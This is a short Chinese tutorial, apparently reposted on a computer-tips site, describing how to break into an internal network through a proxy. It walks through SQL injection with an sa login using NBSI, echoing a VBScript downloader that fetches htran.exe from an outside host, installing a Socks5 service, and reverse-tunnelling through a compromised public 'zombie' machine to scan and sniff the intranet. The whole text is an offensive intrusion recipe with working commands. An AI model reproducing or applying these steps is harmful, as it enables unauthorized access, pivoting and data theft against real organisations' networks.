渗透内网方法之巧用代理 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【meiwen.anslib.com - 电脑资料】

   

    代理在入侵里的作用-----妙用代理,渗透内网

    一、踩点

    主机: http://www.baidu.com/

    OS:Windows 2000 + IIS 5.0 + MSSQL

    端口:80 21

    数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.

    首页存在注入漏洞,sa登陆.

    注入点:

    http://www.baidu.com/list.asp?id=1

    二、入侵思路

    1.给内网目标机装个代理服务器

    2.把弄好的那个代理端口映到公网.

    3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网,

渗透内网方法之巧用代理

    4.接下来就是找共享,嗅探,社会工程学等等了。

    三、入侵准备

    1.公网肉鸡一只:218.3.1.1

    2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。

    3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)

    4.A:192.168.1.2 B:218.3.1.1 C:www.baidu.com D:192.168.0.25

    四、入侵进行时

    1.工具上传:

    在nbsi下执行:

    echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs

    然后下载工具:

    cscript. down.vbs http://IP/htran.exe htran.exe 这个可以在网上找下

    2.安装Socks5服务

    在nbsi下执行:

    htran.exe -install //安装Socks5服务

    htran.exe -start //启动Socks5服务

    3.反弹进行时

    在B上运行: htran.exe -s -listen 520 5200 //监听端口

    在nbsi下执行:htran.exe -s -connect 218.3.1.1 520

    3.进入内网

    现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网,

电脑资料

渗透内网方法之巧用代理》(http://meiwen.anslib.com)。

    五、渗透内网

    接下来就可以扫描,嗅探,等等,也就是后话了。

最新文章